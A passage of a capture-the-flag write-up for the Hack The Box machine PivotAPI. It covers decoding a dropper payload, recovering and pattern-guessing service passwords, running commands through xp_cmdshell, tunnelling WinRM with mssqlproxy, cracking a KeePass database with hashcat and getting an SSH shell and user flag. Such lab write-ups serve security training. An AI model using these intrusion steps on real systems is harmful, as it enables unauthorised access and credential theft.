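    """Mirror the PowerShell stage: concatenate, drop spaces, base64-decode."""
    return base64.b64decode("".join(lines).replace(" ", ""), validate=True)


def looks_like_pe(data):
    """Cheap PE sanity check: 'MZ' header and e_lfanew pointing at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def analyze_dropper(batch_text):
    """Triage summary: who the script runs for, what it stages and deletes,
    and the recovered payload (if an echoed file decodes to a PE)."""
    report = {
        "allowed_users": [u for u, _ in USER_GATE.findall(batch_text)],
        "deleted": DEL_CMD.findall(batch_text),
        "payload_path": None, "payload": b"", "sha256": None,
    }
    for path, lines in assembled_files(batch_text).items():
        m = WRITE_BYTES.search("".join(lines))
        if m:                       # the PowerShell loader names the final file
            report["payload_path"] = m.group(1)
            continue
        try:
            data = decode_stage(lines)
        except ValueError:          # not a base64 blob (e.g. script text)
            continue
        if looks_like_pe(data):
            report["payload"] = data
            report["sha256"] = hashlib.sha256(data).hexdigest()
    return report


if __name__ == "__main__":
    r = analyze_dropper(build_sample_bat())
    print("runs only for:", r["allowed_users"])
    print("writes:", r["payload_path"], "then deletes:", r["deleted"])
    print("recovered", len(r["payload"]), "bytes, sha256", r["sha256"])
```

Feeding the real captured .bat to analyze_dropper() yields the same restart-service.exe bytes the modified script writes to disk, but the hash and PE check come out of the parser alone, so nothing from the dropper has to execute.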

Then run the modified .bat script; the related files are now captured as well:
2024-02-06-18-36-56
Only the new program is of interest; move it to Kali and continue the analysis:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# file restart-service.exe      
restart-service.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, 10 sections
                      
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe | wc -l
10996
                               
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe > restart-service-strings


The program has been stripped to an external PDB (Program Database), which likely means the debug information was removed. Let's look at the strings:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe| grep user 
__setusermatherr                                                                                 
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe| grep -i passw                                                                      
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe| grep -i kaorz

Further static analysis runs into the same situation as before: it also appears encrypted or obfuscated and is hard to analyze. Next, we can again start with Procmon for dynamic analysis using the same steps as before, but this still yields nothing of value.

Monitoring API calls and their parameters

The above monitored the program's behavior at a fairly high level; we can go finer-grained and monitor the API calls the program makes during execution and the parameters it passes, to see whether any sensitive information can be obtained. For Windows programs the API Monitor tool can be used, download link:
http://www.rohitab.com/downloads
Note that all API templates on the left should be selected; then create a new monitored process and choose the path of restart-service.exe. From the valuable information gathered earlier we know the sensitive target is a credential, so we can search for any credential-related keyword and see whether the API calls and parameters contain it. Very quickly, we find it:
2024-02-07-10-49-15
svc_oracle:#oracle_s3rV1c3!2010
This is clearly the Oracle login credential; save it in its own file.
Recalling the key operations event in the earlier email, problems with the Oracle database installed in 2010 led to a migration to MSSQL in 2020, so this credential may not work as-is, but credential reuse is possible; and since the password clearly follows a pattern, password guessing or brute-forcing is also a possibility.
We can check in BloodHound whether this user, or a similar one, still exists:
2024-02-07-11-59-28
We find another user, for MSSQL, so we can reasonably guess that the MSSQL password follows the same rule as the Oracle one: s3rV1c3! stays the same, while the year (which matches the one mentioned in the email) and the prefix (service name) change to fit what we know about MSSQL, i.e.:
svc_mssql:#mssql_s3rV1c3!2020
Check whether the credential is valid:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# crackmapexec smb $ip1 -u svc_mssql -p '#mssql_s3rV1c3!2020'
SMB         10.129.207.210  445    PIVOTAPI         [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)

[*] completed: 100.00% (1/1)
SMB         10.129.207.210  445    PIVOTAPI         [+] LicorDeBellota.htb\svc_mssql:#mssql_s3rV1c3!2020

It is clearly valid. This is no coincidence: many large companies have strict rules and procedures, so passwords set by operations staff very likely follow a pattern; the guess above was also based on the valuable information we had gathered, and it was then verified.

Connecting to MSSQL to gather more information

Try connecting to MSSQL:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# mssqlclient.py 'LicorDebellota.htb/svc_mssql:#mssql_s3rV1c3!2020@10.129.207.210'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (sa  dbo@master)> 

Notice that the first connection attempt with the obtained credential did not succeed, but switching to the default MSSQL user name did. Had that failed too, we could have considered the three user names leaked by the earlier .bat script. Next we can try to enable the command execution option in order to gather information in more depth:

SQL (sa  dbo@master)> enable_xp_cmdshell
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 185: Se ha cambiado la opción de configuración 'show advanced options' de 1 a 1. Ejecute la instrucción RECONFIGURE para instalar.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 185: Se ha cambiado la opción de configuración 'xp_cmdshell' de 1 a 1. Ejecute la instrucción RECONFIGURE para instalar.
SQL (sa  dbo@master)> xp_cmdshell whoami
output                        
---------------------------   
nt service\mssql$sqlexpress   

NULL                          

SQL (sa  dbo@master)> 

System information collected:

SQL (sa dbo@master)> xp_cmdshell systeminfo
output
--------------------------------------------------------------------------------
NULL

Host Name:                               PIVOTAPI

OS Name:                                 Microsoft Windows Server 2019 Standard

OS Version:                              10.0.17763 N/D Build 17763

OS Manufacturer:                         Microsoft Corporation

OS Configuration:                        Primary Domain Controller

OS Build Type:                            Multiprocessor Free

Registered Owner:                        Windows User

Registered Organization:

Product ID:                              00429-00520-27817-AA848

Original Install Date:                   07/08/2020, 23:14:31

System Boot Time:                        06/02/2024, 8:39:58

System Manufacturer:                     VMware, Inc.

System Model:                            VMware7,1

System Type:                             x64-based PC

Processor(s):                            2 Processor(s) Installed.

                                       [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz

                                       [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz

BIOS Version:                            VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020

Windows Directory:                       C:\Windows

System Directory:                        C:\Windows\system32

Boot Device:                             \Device\HarddiskVolume2

System Locale:                           es;Spanish (International)

Input Locale:                            en-us;English (United States)

Time Zone:                               (UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna

Total Physical Memory:                   4,095 MB

Available Physical Memory:               2,888 MB

Virtual Memory: Max Size:                 4,799 MB

Virtual Memory: Available:                3,520 MB

Virtual Memory: In Use:                   1,279 MB

Page File Location(s):                    C:\pagefile.sys

Domain:                                  LicorDeBellota.htb

Logon Server:                            N/A

Hotfix(es):                             8 Hotfix(s) Installed.

                                       [01]: KB4601558

                                       [02]: KB4494174

                                       [03]: KB4535680

                                       [04]: KB4558997

                                       [05]: KB4577586

                                       [06]: KB4601393

                                       [07]: KB5001404

                                       [08]: KB5001342

Network Card(s):                         1 NIC(s) Installed.

                                       [01]: vmxnet3 Ethernet Adapter

                                             Connection Name: Ethernet0 2

                                             DHCP Enabled:    Yes

                                             DHCP Server:      10.129.0.1

                                             IP Address(es)

                                             [01]: 10.129.207.210

Hyper-V Requirements:                    A hypervisor was detected. Features required for Hyper-V will not be displayed.

Check which privileges the current user has:

SQL (sa dbo@master)> xp_cmdshell whoami /priv
output
--------------------------------------------------------------------------------
NULL

PRIVILEGE INFORMATION

--------------------------

NULL

Privilege Name               Description                                      State          

============================= ================================================ =============

SeAssignPrimaryTokenPrivilege Replace a process-level token                    Disabled

SeIncreaseQuotaPrivilege      Adjust memory quotas for a process               Disabled

SeMachineAccountPrivilege     Add workstations to the domain                   Disabled

SeChangeNotifyPrivilege       Bypass traverse checking                         Enabled

SeManageVolumePrivilege       Perform volume maintenance tasks                 Enabled

SeImpersonatePrivilege        Impersonate a client after authentication        Enabled

SeCreateGlobalPrivilege       Create global objects                            Enabled

SeIncreaseWorkingSetPrivilege Increase a process working set                   Disabled

From experience, SeImpersonatePrivilege and SeManageVolumePrivilege are both key privileges associated with privilege escalation and are worth trying, but for the purpose of learning domain penetration this can be given lower priority for now (since tools could likely escalate privileges directly).
We can also check whether there are other domain users:

SQL (sa dbo@master)> xp_cmdshell net user
output
-------------------------------------------------------------------------------
NULL

User accounts on \\PIVOTAPI

NULL

-------------------------------------------------------------------------------

0xdf                     0xVIC                    3v4Si0N

Administrador            aDoN90                   borjmz

cybervaca                Dr.Zaiuss                Fiiti

FrankyTech               Gh0spp7                  gibdeon

Invitado                 ippsec                   jari

Jharvar                  Kaorz                    krbtgt

lothbrok                 manulqwerty              OscarAkaElvis

socketz                  sshd                     StooormQ

superfume                svc_mssql                v1s0r

The command completed successfully.

We spot svc_mssql, the user name from the credential we obtained; let's look at its details:

SQL (sa dbo@master)> xp_cmdshell net user svc_mssql /domain
output
-----------------------------------------------------------------------------
Username                                  svc_mssql                             

Full Name                                mssql service                         

Comment                                                                      

User's comment                                                                

Country/region code                      000 (Default by the computer)          

Account active                           Yes                                  

Account expires                          Never                                

NULL                                                                         

Last password change                     08/08/2020 17:15:22                  

Password expires                         Never                                

Password changeable                      09/08/2020 17:15:22                  

Password required                        Yes                                  

User may change password                  No                                  

NULL                                                                         

Workstations allowed                     All                                  

Logon script                                                                  

User profile                                                                 

Home directory                                                              

Last logon                               09/08/2020 17:22:26                  

NULL                                                                         

Logon hours allowed                      All                                  

NULL                                                                         

Local group memberships                                                      

Global group memberships                 *Domain Users                         

                                         *WinRM                                

The command completed successfully.

This user is in the WinRM group besides Domain Users, and the earlier email did mention that service, so first check whether the service is running:

SQL (sa  dbo@master)> xp_cmdshell netstat -ano | find "5985"
output                                                                     
------------------------------------------------------------------------   
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4   

  TCP    [::]:5985              [::]:0                 LISTENING       4 

开启了并且在监听中,只是没有对外暴露,邮件中还提到创建了一个规则来实现阻止对外暴露并封锁了TCP、UDP甚至ICMP的输出,因此通用的隧道转发等方式都行不通了。但是我们拿到了mssql的默认系统管理员用户,还可以尝试用mssqlproxy工具,链接:https://github.com/blackarrowsec/mssqlproxy

mssqlproxy 是一个工具包,旨在通过套接字重用,通过受损的 Microsoft SQL Server 在受限环境中执行横向移动。客户端需要 SQL Server 上的 impacket 和 sysadmin 权限。

mssqlproxy绕过封锁规则

But when we clone this repository, the mssqlclient.py it ships only works under Python 2, whereas Python 3 is what is commonly used now. In this situation we usually first search for someone else's solution, and only if none exists do we modify the tool ourselves based on our own understanding of and experience with security development. A search turned up:
[screenshot: 2024-02-07-16-14-52]
Clone this new repository instead and try it:

┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# cp reciclador.dll ../
                                        
┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# cd ..                
                                             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls
 20240128095527_bloodhound.zip     oracle_credential           restart-service-strings   users_list
 api-monitor-v2r13-setup-x64.exe   pdf_authors                'Server MSSQL.eml'        'WinRM Service.eml'
 ftp                               pivotapi.pdf               'Server MSSQL.msg'        'WinRM Service.msg'
 Kaorz_hash                        reciclador.dll              set_export.sh
 mssqlproxy                        Restart-OracleService.exe   strings_Restart-Oracle
 nmapscan                          restart-service.exe         systeminfo

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 mssqlproxy/mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> enable_ole
SQL> upload reciclador.dll c:\windows\temp\reciclador.dll
[+] Uploading 'reciclador.dll' to 'c:\windows\temp\reciclador.dll'...
[+] Size is 109056 bytes
[+] Upload completed
SQL> Traceback (most recent call last):
  File "/home/cvestone/Desktop/htb/PivotAPI/mssqlproxy/mssqlclient.py", line 547, in <module>
    shell.cmdloop()
  File "/usr/lib/python3.11/cmd.py", line 126, in cmdloop
    line = input(self.prompt)
           ^^^^^^^^^^^^^^^^^^
KeyboardInterrupt
┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# ls
assembly.cs  Microsoft.SqlServer.Proxy.dll  mssqlclient.py  README.md  reciclador  reciclador.dll

But this repository seems to contain only the assembly.cs source and no compiled file. We can either search for an already compiled DLL or compile it ourselves.
It turns out the official project has already published one:
[screenshot: 2024-02-07-16-31-14]

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# wget -m https://github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll
--2024-02-07 16:31:57--  https://github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll
正在解析主机 github.com (github.com)... 20.205.243.166
正在连接 github.com (github.com)|20.205.243.166|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 302 Found
位置:https://objects.githubusercontent.com/github-production-release-asset-2e65be/239964495/ec7f2480-4e5a-11ea-84f8-efa3df9d6c73?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240207%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240207T083158Z&X-Amz-Expires=300&X-Amz-Signature=65ab9367d1aeb7eb965069fa9ad2e4c5f4c85e86c55607081311933c351a2a42&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=239964495&response-content-disposition=attachment%3B%20filename%3Dassembly.dll&response-content-type=application%2Foctet-stream [跟随至新的 URL]
--2024-02-07 16:31:58--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/239964495/ec7f2480-4e5a-11ea-84f8-efa3df9d6c73?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240207%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240207T083158Z&X-Amz-Expires=300&X-Amz-Signature=65ab9367d1aeb7eb965069fa9ad2e4c5f4c85e86c55607081311933c351a2a42&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=239964495&response-content-disposition=attachment%3B%20filename%3Dassembly.dll&response-content-type=application%2Foctet-stream
正在解析主机 objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
正在连接 objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:4608 (4.5K) [application/octet-stream]
正在保存至: “github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll”

github.com/blackarrowsec/ms 100%[==========================================>]   4.50K  --.-KB/s  用时 0s      

2024-02-07 16:31:59 (54.4 MB/s) - 已保存 “github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll” [4608/4608])

下载完毕 --2024-02-07 16:31:59--
总用时:2.4s
下载了:1 个文件,0s (54.4 MB/s) 中的 4.5K
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cp github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll ./          
                                                                                                               
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 mssqlproxy/mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210' -install -clr assembly.dll                                                                                                  
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[*] Proxy mode: install
[*] CLR enabled
[*] Assembly successfully installed
[*] Procedure successfully installed

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 mssqlproxy/mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210' -start -reciclador 'c:\windows\temp\reciclador.dll'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[*] Proxy mode: check
[*] Assembly is installed
[*] Procedure is installed
[*] reciclador is installed
[*] clr enabled
[*] Proxy mode: start
[*] Listening on port 1337...
[*] ACK from server!

Port 1337 is now open and listening; to be rigorous we can verify it with netstat as well:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# netstat -tnlp | grep 1337
tcp        0      0 0.0.0.0:1337            0.0.0.0:*               LISTEN      155907/python3      
Connecting to WinRM to get a shell

Next we can go through proxychains:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# nt /etc/proxychains4.conf 
# append at the end: socks5 	127.0.0.1 1337
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# proxychains evil-winrm -i 127.0.0.1 -u svc_mssql -p '#mssql_s3rV1c3!2020'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain  ...  127.0.0.1:1337  ...  127.0.0.1:5985  ...  OK
*Evil-WinRM* PS C:\Users\svc_mssql\Documents> whoami
licordebellota\svc_mssql

But, perhaps because of the state of the proxy connection or for some other reason, this shell is not very stable: it often drops, and then it takes about a minute before a command succeeds again. That is the normal state of affairs in a penetration test. If we knew the cause and how to fix it we would save a lot of time, but without knowing we can only repeat the process again and again, and in the current situation there is no way to troubleshoot it, so we simply have to wait.

*Evil-WinRM* PS C:\Users\svc_mssql\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\svc_mssql\desktop> ls


    Directorio: C:\Users\svc_mssql\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         8/8/2020  10:12 PM           2286 credentials.kdbx
-a----        4/30/2021  10:39 AM             93 note.txt
*Evil-WinRM* PS C:\Users\svc_mssql\desktop> download credentials.kdbx
                                        
Info: Downloading C:\Users\svc_mssql\desktop\credentials.kdbx to credentials.kdbx
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_mssql\desktop> download note.txt 
                                        
Info: Downloading C:\Users\svc_mssql\desktop\note.txt to note.txt
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_mssql\desktop> 

Look at the files we just downloaded:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cat ./note.txt                                                              
Long running MSSQL Proxies can cause issues.  Please switch to SSH after getting credentials.  

This note tells us that long-running MSSQL proxies cause problems, which is exactly what we just ran into. Of course, this is very much a lab-machine touch; in the real world there would be no such explicit hint, but anyone who cannot stand waiting every time a command is run will naturally want another way to get a more stable shell. Problems like this are also often caused by some setting the administrator has configured.

As for the .kdbx file, that is the extension of a KeePass Password Safe database. To open a .kdbx file you need KeePass or a compatible password manager, which is graphical; you can also use the command-line tool kpcli, which can be installed from the Linux distribution's package manager.

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# kpcli --kdb credentials.kdbx 
Provide the master password: 
# the master password still has to be cracked, so first generate the intermediate hash:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# keepass2john credentials.kdbx   
credentials:$keepass$*2*60000*0*006e4f7f747a915a0301bded09da8339260ff96caf1ca7cef63b8fdd37c6a836*deabca672663938eddc0ee9e2726d9ff65d4ab7c6863f6f712f1c14b97c670a2*b33392502f94cd323ed25bc2d9c1749a*67ac769a9693b2ef7f1a149fb4e182042fcd2888df727ef4226edb5d9ae35c5c*dccf52b56e846bf088caa284beeaceffe16f304586ee13e87197387bac16ca6b
                              
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# keepass2john credentials.kdbx > credentials.kdbx.hash

# crack it with hashcat
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# hashcat --help | grep -i keepass
  13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES)                | Password Manager
  29700 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) - keyfile only mode | Password Manager
                    
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# hashcat -m 13400 credentials.kdbx.hash /usr/share/wordlists/rockyou.txt --user
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i5-13500HX, 30953/61970 MB (8192 MB allocatable), 20MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 5 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$keepass$*2*60000*0*006e4f7f747a915a0301bded09da8339260ff96caf1ca7cef63b8fdd37c6a836*deabca672663938eddc0ee9e2726d9ff65d4ab7c6863f6f712f1c14b97c670a2*b33392502f94cd323ed25bc2d9c1749a*67ac769a9693b2ef7f1a149fb4e182042fcd2888df727ef4226edb5d9ae35c5c*dccf52b56e846bf088caa284beeaceffe16f304586ee13e87197387bac16ca6b:mahalkita
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*60000*0*006e4f7f747a915a0301bded09da833...16ca6b
Time.Started.....: Wed Feb  7 18:13:36 2024 (0 secs)
Time.Estimated...: Wed Feb  7 18:13:36 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      885 H/s (3.41ms) @ Accel:16 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 320/14344385 (0.00%)
Rejected.........: 0/320 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:59392-60000
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> 101010
Hardware.Mon.#1..: Temp: 68c Util:  7%

Started: Wed Feb  7 18:13:19 2024
Stopped: Wed Feb  7 18:13:37 2024

The password mahalkita is cracked quickly. Reconnect and try some commands:

kpcli:/> ls
=== Groups ===
Database/
kpcli:/> cd Database/
kpcli:/Database> ls
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
kpcli:/Database> ls eMail/
kpcli:/Database> ls General/
kpcli:/Database> ls Homebanking/
kpcli:/Database> ls Internet/
kpcli:/Database> ls Network/
kpcli:/Database> ls Recycle\ Bin/
=== Entries ===
0. Sample Entry                                               keepass.info
1. Sample Entry #2                          keepass.info/help/kb/testform.
kpcli:/Database> ls Windows/
=== Entries ===
0. SSH                                                                    
kpcli:/Database> show -f Recycle\ Bin/Sample\ Entry

 Path: /Database/Recycle Bin/
Title: Sample Entry
Uname: User Name
 Pass: Password
  URL: https://keepass.info/
Notes: Notes

kpcli:/Database> show -f Recycle\ Bin/Sample\ Entry\ #2 

 Path: /Database/Recycle Bin/
Use of uninitialized value $comment in split at /usr/bin/kpcli line 6338.
Use of uninitialized value $val in pattern match (m//) at /usr/bin/kpcli line 3275.
Use of uninitialized value $val in sprintf at /usr/bin/kpcli line 3279.
Title: Sample Entry #2
Uname: Michael321
 Pass: 12345
  URL: https://keepass.info/help/kb/testform.html
Notes: 

kpcli:/Database> show -f Windows/SSH

 Path: /Database/Windows/
Title: SSH
Uname: 3v4Si0N
 Pass: Gu4nCh3C4NaRi0N!23
  URL: 
Notes: 

Clearly, taken together with the information gathered earlier, the last entry is the most valuable.

Getting a foothold

Connect with the SSH credentials just obtained:

┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# ssh 3v4Si0N@10.129.207.210                                                                                 
The authenticity of host '10.129.207.210 (10.129.207.210)' can't be established.                                                                                            
ED25519 key fingerprint is SHA256:D84pRKEdwy8GejDfHWYVRaAr8wMUPhSz0V4EUOCZC3Y.                       
This host key is known by the following other names/addresses:                                                      
    ~/.ssh/known_hosts:14: [hashed name]                                                                  
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
...
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>cd Desktop

licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N\Desktop>dir
 El volumen de la unidad C no tiene etiqueta.
 El número de serie del volumen es: 94DB-AFCA

 Directorio de C:\Users\3v4Si0N\Desktop

09/08/2020  16:01    <DIR>          .
09/08/2020  16:01    <DIR>          ..
06/02/2024  08:41                34 user.txt
               1 archivos             34 bytes
               2 dirs   4.234.256.384 bytes libres

licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N\Desktop>type user.txt
ecd5457068cd545b4f64647d1d017ed3

So the user flag is: ecd5457068cd545b4f64647d1d017ed3

Lateral movement
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\3v4Si0N\Desktop> cd c:\
PS C:\> ls


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       08/08/2020     19:23                Developers
d-----       08/08/2020     12:53                inetpub
d-----       08/08/2020     22:48                PerfLogs
d-r---       19/02/2021     13:42                Program Files
d-----       09/08/2020     17:06                Program Files (x86)
d-r---       08/08/2020     19:46                Users
d-----       29/04/2021     17:31                Windows
PS C:\> cd .\Developers\
PS C:\Developers> ls
ls : Access to the path 'C:\Developers' is denied.
At line:1 char:1
+ ls
+ ~~
    + CategoryInfo          : PermissionDenied: (C:\Developers:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
# The "Developers" here looks like a user group name
PS C:\Developers> net group /domain

Group Accounts for \\PIVOTAPI

-------------------------------------------------------------------------------
*Administrators key
*Administrators key of the organization
*Business Administrators
*Schema Admins
*Domain Admins
*Domain Controllers
*Cloneable Domain Controllers
*Read-only Domain Controllers
*Developers
*DnsUpdateProxy
*Enterprise Domain Controllers Read-Only
*Domain Computers
*Domain Guests
*LAPS ADM
*LAPS READ
*Group Policy Creator Owners
*Protected Users
*Domain Users
*WinRM
